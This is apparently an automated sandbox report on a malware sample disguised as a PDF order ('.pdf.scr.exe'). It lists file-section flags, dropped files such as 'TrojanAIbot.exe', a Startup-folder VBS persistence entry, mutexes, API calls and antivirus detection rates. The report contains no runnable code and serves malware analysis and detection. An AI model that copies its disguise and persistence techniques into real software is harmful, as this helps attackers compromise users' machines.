Source: surmit.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroTextExtractor.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADelRCP.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADNotificationManager.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeCollabSync.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVLP.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OneDriveSetup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Integrator.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WCChromeNativeMessagingHost.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRLogTransport.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRWindowsClientService.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Eula.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: LogTransport2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@52/176@75/20

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0044CE7A GetLastError,FormatMessageW,

0_2_0044CE7A

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0043B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0043B134
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0043AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0043AB84

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0044E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0044E1FD

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00446532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00446532

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0045C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0045C18C

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0040406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0040406B

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00C0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00C0CBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

File created: C:\Users\user\AppData\Roaming\314fa8116a46337b.bin

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-314fa8116a46337b9ea72c54-b
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-314fa8116a46337b-inf
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-314fa8116a46337b7d8e3ee9-b

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

File created: C:\Users\user\AppData\Local\Temp\aut129E.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs"

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Order SMG 201906 20190816order.pdf.scr.exe	Virustotal: Detection: 83%
Source: Order SMG 201906 20190816order.pdf.scr.exe	ReversingLabs: Detection: 84%

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

File read: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
